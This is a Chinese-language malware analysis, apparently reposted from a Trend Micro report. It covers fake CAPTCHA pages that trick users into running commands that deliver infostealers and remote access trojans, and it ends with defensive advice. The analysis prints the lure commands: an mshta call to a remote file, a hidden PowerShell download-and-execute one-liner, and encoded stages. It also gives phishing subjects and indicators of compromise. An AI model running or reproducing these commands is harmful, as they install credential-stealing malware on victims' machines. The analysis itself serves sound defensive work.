剖析虚假验证码攻击链:多阶段载荷部署信息窃取器与远程访问木马

本文详细分析了利用虚假CAPTCHA页面诱导用户执行恶意命令的攻击活动,涉及多阶段载荷投递、内存执行规避检测技术,以及Lumma Stealer、Rhadamanthys等多种恶意软件家族的技术细节与防御方案。

初始访问

用户通过钓鱼邮件、恶意广告或搜索引擎优化(SEO)中毒等方式访问仿冒的CAPTCHA验证页面。页面诱导用户复制恶意命令到Windows运行对话框(Win+R)执行。典型命令格式:

1
2

mshta.exe hxxps://ernier[.]shop/lyricalsync[.]mp3 # ''Ι am nοt a rοbοt: САРТСНА Verification UID: 885203
PowerShell.exe -W Hidden -command $uri = 'hxxps[://]fessoclick[.]com/clck/dub.txt'; $content = (Invoke-WebRequest -Uri $uri).Content; Invoke-Expression $content

钓鱼邮件主题常涉及"客人遗留物品"等紧急事务,例如:

  • Action Required - Guest’s Valuable Items Left Behind
  • Urgent Security Concern: Guest’s Unclaimed Identification Documents

邮件中嵌入的URL利用合法域名(如https://xxx[.]51.ca)进行重定向,部分案例通过PDF附件中的链接跳转到虚假CAPTCHA页面。

执行技术分析

多阶段载荷投递

攻击链核心特点:

  1. 内存执行规避检测:通过mshta.exe或PowerShell直接执行远程脚本,避免文件落地
  2. MP3文件隐藏恶意代码:下载合法音频文件(如来自jamendo.com)并注入混淆JavaScript
  3. 动态命令生成:页面JavaScript自动解码Base64编码命令并复制到用户剪贴板

技术细节

第一阶段:MP3文件解析

执行lyricalsync.mp3时触发多阶段反混淆过程:

1
2
3
4
5

# Base64编码初始脚本
"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -w h -nop -ep un -E JABSAHgAVQB6ACAAPQAgACcANgA5ADYANQA3ADgANQAzADcANAA2ADEANwAyADcANAAyAEQANQAwADcAMgA2AEYANgAzADYANQA3ADMANwAzADIAMAAyADIAMgA0ADYANQA2AEUANwA2ADMAQQA1ADcANAA5ADQARQA0ADQANAA5ADUAMgA1AEMANQAzADcAOQA3ADMANQA3ADQARgA1ADcAMwA2ADMANAA1AEMANQA3ADYAOQA2AEUANgA0ADYARgA3ADcANwAzADUAMAA2AEYANwA3ADYANQAv...

# 十六进制编码第二阶段脚本
$RxUz = '69657853746172742D50726F63657373202224656E763A57494E4449525C537973574F5736345C57696E646F7773506F7765725368656C6C5C76312E305C706F7765727368656C6C2E65786522202D417267756D656E744C69737420272D4E6F50726F66696C65272C272D457865637574696F6E506F6C696379272C27556E72657374726963746564272C272D436F6D6D616E64272C27535620396620285B4E65742E576...'

最终载荷执行

完全解码后的PowerShell脚本:

  1. 创建WebClient对象下载XLSX文件(实际为PowerShell脚本)
  2. 连接到恶意域名:buyvault[.]shop, bi.yuoei[.]shop
  3. 向svchost.exe执行代码注入
  4. 通过DLL侧加载执行恶意代码(检测为PUA.Win32.FakeGoop.A.component)

恶意软件家族关联

通过IoC关联分析确认攻击链分发以下恶意软件:

  • Lumma Stealer:通过VirusTotal关系图确认分发节点关联
  • Emmenhtal:C&C基础设施与已知Emmenhtal活动重叠
  • Rhadamanthys:历史恶意软件提交记录显示基础设施复用
  • AsyncRAT/XWorm:共享分发URL(185[.]7[.]214[.]108/a[.]mp4)托管多类型载荷

防御建议

  1. 禁用运行对话框:在需限制脚本执行的环境中禁用Win+R
  2. 最小权限原则:限制用户写入/执行敏感目录的权限
  3. 访问控制:阻止访问未授权的文件共享服务平台
  4. 行为监控:监测异常剪贴板操作和进程行为
  5. 浏览器加固:限制不可信域的JavaScript执行,启用恶意广告网络过滤
  6. 内存保护:启用Windows内置内存执行检测功能
  7. 用户教育:培训识别钓鱼邮件和可疑链接的能力

Trend Micro解决方案

  • 行为监控:实时检测mshta.exe、powershell.exe异常行为
  • 预测性机器学习(PML):基于文件特征分析阻止混淆加载器
  • Web信誉服务(WRS):阻止访问恶意URL
  • MDR服务:提供持续监控和威胁狩猎能力

Trend Vision One™客户可通过威胁情报报告和狩猎查询获取最新IoC及检测规则。完整IoC列表参见原文附件。

comments powered by Disqus
© 2020 - 2025 qife
使用 Hugo 构建
主题 StackJimmy 设计
本站总访问量 本站访客数人次